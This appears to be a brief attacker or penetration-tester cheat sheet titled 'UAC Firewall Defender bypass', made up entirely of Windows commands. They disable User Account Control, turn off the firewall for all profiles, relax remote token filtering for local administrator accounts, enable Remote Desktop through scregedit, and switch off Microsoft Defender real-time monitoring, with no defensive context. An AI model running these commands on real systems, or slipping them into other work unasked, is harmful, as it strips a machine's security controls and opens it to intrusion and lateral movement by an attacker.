UAC Firewall Defender bypass
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
NetSh Advfirewall set allprofiles state off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cd\; cscript windows\system32\scregedit.wsf /ar 0
powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"